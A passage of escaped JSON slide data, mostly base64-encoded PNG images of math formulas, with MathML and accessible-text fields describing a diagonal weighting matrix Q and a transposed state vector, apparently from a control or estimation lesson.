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\&quot;,\&quot;slideId\&quot;:320,\&quot;accessibleText\&quot;:\&quot;Q space equals thin space open square brackets table row cell 1 over 100 end cell 0 row 0 100 end table close square brackets\&quot;,\&quot;imageHeight\&quot;:47.567567567567565},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msup&gt;&lt;mfenced open=\\\&quot;[\\\&quot; close=\\\&quot;]\\\&quot;&gt;&lt;mtable&gt;&lt;mtr&gt;&lt;mtd&gt;&lt;mi&gt;y&lt;/mi&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mtd&gt;&lt;mtd&gt;&lt;msub&gt;&lt;mi&gt;x&lt;/mi&gt;&lt;mi&gt;i&lt;/mi&gt;&lt;/msub&gt;&lt;mfenced&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mfenced&gt;&lt;/mtd&gt;&lt;/mtr&gt;&lt;/mtable&gt;&lt;/mfenced&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;/msup&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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